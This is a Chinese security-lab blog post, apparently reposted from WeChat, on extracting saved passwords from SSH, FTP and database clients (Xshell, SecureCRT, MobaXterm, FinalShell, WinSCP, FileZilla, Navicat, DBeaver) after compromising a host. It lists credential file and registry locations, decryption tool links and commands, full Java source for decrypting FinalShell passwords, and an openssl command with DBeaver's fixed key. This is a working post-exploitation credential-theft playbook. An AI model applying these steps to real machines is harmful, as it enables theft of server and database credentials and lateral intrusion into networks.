强烈推荐,内网常用工具密码获取(上)
2022-9-7 18:9:46 Author: 戟星安全实验室(查看原文) 阅读量:43 收藏

戟星安全实验室

    忆享科技旗下高端的网络安全攻防服务团队.安服内容包括渗透测试、代码审计、应急响应、漏洞研究、威胁情报、安全运维、攻防演练等

本文约5792字,阅读约需15分钟。

0x00 前言

在拿到系统权限后,系统中可能存在连接其他服务器的软件、数据库或浏览器等,这时候就需要去解密像ssh这类的连接软件,所有这里我对大部分软件的密码获取做一下总结

0x01 网络传输协议工具类

  • xshell

Xshell 是一个强大的安全终端模拟软件,它支持SSH1, SSH2, 以及Microsoft Windows 平台的TELNET 协议。

先找到xshell保存密码的位置,点打开会话文件夹

其中.xsh里面就是保存的链接信息包括账户密码

前提是登录的时候必须勾选了记住账户和密码

离线解密工具下载:

https://github.com/HyperSine/how-does-Xmanager-encrypt-password
python XShellCryptoHelper.py -d -key 123123 zvHVi7hm/Nsk6y2BGNVpTNSvXlPRN+/1P+aQKhFF5XJ3l2

123132为主控密码在文件导出的时候设置  后面为.xsh文件中的password字段类容

另一种解法 未设置主控密码

python XShellCryptoHelper.py -d -user aaaa -sid S-1-5-21-4217108860-1001 zvHVi7hm/Nsk6y2BGNVpTNSvXlPRN+/1P+aQKhFF5XJ3l2

whoami /user 查看usersid

使用在线工具

https://github.com/uknowsec/SharpDecryptPwd

该工具只支持在线解密的方式,就是必须要将工具放到目标机器上运行。

xftp一样的

  • SecureCRT

SecureCRTxshell一样,很多运维人员会将SSH的账号密码保存在上面。

前提时管理员登录时勾选了记住密码

SecureCRT密码密码存放位置

C:\Users\oneseven\AppData\Roaming\VanDyke\Config\Sessions

打开后 密码是加密的 我们需要对其进行解密

SecureCRT 离线解密工具:

https://github.com/HyperSine/how-does-SecureCRT-encrypt-password
python SecureCRTCipher.py dec -v2 <密码>

  • MobaXterm

MobaXterm是一款远程终端控制软件,集串口,SSH远程登录和FTP传输三合一的工具,便携版操作简单,使用非常方便。

连接过后会在当前目录生成一个.ini文件

其中就储存着我们登录的账户密码

离线工具下载:

https://github.com/HyperSine/how-does-MobaXterm-encrypt-password

使用命令

python MobaXtermCipher.py dec -sp <ini文件中的SessionP> <加密的Passwords>

  • finalshell

FinalShell是一体化的的服务器,网络管理软件,不仅是ssh客户端,还是功能强大的开发,运维工具,充分满足开发,运维需求

连接信息存储在C:\Users\oneseven\AppData\Local\finalshell\conn\目录下 有多少条连接就会有多少个xxx_connect_config.json文件

用户登录时必须勾选记住密码,否则不会在xxx_connect_config.json文件中保存密码

离线解密:别人已经写好了的java代码

FinalShellDecodePass.java

import java.io.ByteArrayOutputStream;import java.io.DataOutputStream;import java.io.IOException;import java.math.BigInteger;import java.security.MessageDigest;import  java.security.NoSuchAlgorithmException;import java.security.SecureRandom;import java.util.Base64;import java.util.Random; import javax.crypto.Cipher;import javax.crypto.SecretKey;import javax.crypto.SecretKeyFactory;import javax.crypto.spec.DESKeySpec; public class FinalShellDecodePass {          public static void main(String[] args)throws Exception {              System.out.println(decodePass(args[0]));     }     public static byte[] desDecode(byte[] data, byte[] head) throws  Exception {              SecureRandom sr = new SecureRandom();         DESKeySpec dks = new DESKeySpec(head);         SecretKeyFactory keyFactory =  SecretKeyFactory.getInstance("DES");         SecretKey securekey = keyFactory.generateSecret(dks);         Cipher cipher = Cipher.getInstance("DES");         cipher.init(2, securekey, sr);         return cipher.doFinal(data);     }     public static String decodePass(String data) throws Exception {              if (data == null) {                 return null;         } else {                 String rs = "";            byte[] buf =  Base64.getDecoder().decode(data);            byte[] head = new byte[8];            System.arraycopy(buf, 0, head, 0,  head.length);            byte[] d = new byte[buf.length -  head.length];            System.arraycopy(buf,  head.length, d, 0, d.length);            byte[] bt = desDecode(d,  ranDomKey(head));            rs = new String(bt);             return rs;         }     }     static byte[] ranDomKey(byte[] head) {              long ks = 3680984568597093857L / (long)(new  Random((long)head[5])).nextInt(127);         Random random = new Random(ks);         int t = head[0];          for(int i = 0; i < t; ++i) {                 random.nextLong();         }          long n = random.nextLong();         Random r2 = new Random(n);         long[] ld = new long[]{     (long)head[4], r2.nextLong(), (long)head[7], (long)head[3],  r2.nextLong(), (long)head[1], random.nextLong(), (long)head[2]};         ByteArrayOutputStream bos = new ByteArrayOutputStream();         DataOutputStream dos = new DataOutputStream(bos);         long[] var15 = ld;         int var14 = ld.length;          for(int var13 = 0; var13 < var14; ++var13) {                 long l = var15[var13];             try {                     dos.writeLong(l);            } catch (IOException var18) {                     var18.printStackTrace();            }         }          try {                 dos.close();         } catch (IOException var17) {                 var17.printStackTrace();         }          byte[] keyData = bos.toByteArray();         keyData = md5(keyData);         return keyData;     }     public static byte[] md5(byte[] data) {              String ret = null;         byte[] res=null;          try {                 MessageDigest m;            m =  MessageDigest.getInstance("MD5");            m.update(data, 0, data.length);            res=m.digest();            ret = new BigInteger(1,  res).toString(16);         } catch (NoSuchAlgorithmException e) {                 e.printStackTrace();         }         return res;     }}

先进行编译

javac FinalShellDecodePass.java

在运行

java FinalShellDecodePass <password>

其中password就是xxx_connect_config.json文件中的password字段类容

  • Winscp

一个 Windows 环境下使用的SSH 的开源图形化 SFTP 客户端

解密

密码是保存在注册表中

reg query "HKEY_CURRENT_USER\Software\MartinPrikryl\WinSCP 2\Sessions”

可以看到链接名称,但需要建站点时保存密码

离线工具

https://github.com/anoopengineer/winscppasswd

使用命令

winscppasswd.exe <主机>  <用户名>  <加密密码>

使用在线工具SharpDecryptPwd可直接获取密码

  • FileZilla

一款FTP操作类的软件

首先导出记录

导出后是一个xml文件  打开后base64就是密码 直接解密就行

使用在线工具SharpDecryptPwd

0x02 数据库

  • Navicat

Navicat是一套可创建多个连接的数据库管理工具,用以方便管理 MySQLOraclePostgreSQLSQLiteSQL ServerMariaDB/ MongoDB 等不同类型的数据库,并支持管理某些云数据库,例如阿里云、腾讯云。

连接信息是存在注册表里面

数据库

注册表位置

MySQL

HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\<your  connection name>

MariaDB

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\<your  connection name>

MicrosoftSQL

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\<your  connection name>

Oracle

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\<your  connection name>

PostgreSQL

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\<your  connection name>

SQLite

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\<your  connection name>

MongoDB

HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB\Servers\<your  connection name>

这里就只测下用mysql举例子, 其他都一样

离线工具:

https://github.com/HyperSine/how-does-navicat-encrypt-password/tree/master/python3

我们需要的是注册表中的Pwd字段的类容

python NavicatCipher.py dec 5658213B

使用在线工具SharpDecryptPwd进行解密

  • DBeaver

dbeaver是免费和开源(GPL)为开发人员和数据库管理员通用数据库工具。易用性是该项目的主要目标,是经过精心设计和开发的数据库管理工具。

连接时勾选保存密码到本地

C:\Users\oneseven\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver\目录里.json文件中存放着数据库的连接信息和密码,credentials-config.json里是密码但做了加密

离线解密:使用openssl解密,将credentials-config.json文件放入当前目录

openssl aes-128-cbc -d -K  babb4a9f774ab853c96c2d653dfe544a -iv 00000000000000000000000000000000 -in  credentials-config.json | dd bs=1 skip=16

0x03 总结

后续会更新远程工具和浏览器的密码获取方式。

 声明

    由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,戟星安全实验室及文章作者不为此承担任何责任。

    戟星安全实验室拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经戟星安全实验室允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

戟星安全实验室

# 长按二维码 关注我们 #


文章来源: http://mp.weixin.qq.com/s?__biz=MzkzMDMwNzk2Ng==&mid=2247500023&idx=1&sn=6253e58ce0515854a9cee50c03e829c5&chksm=c27ecae6f50943f0945e2488e56a1e3bbbb9443da42539943a1574e35d6a6d2255d3b66011bf#rd
如有侵权请联系:admin#unsafe.sh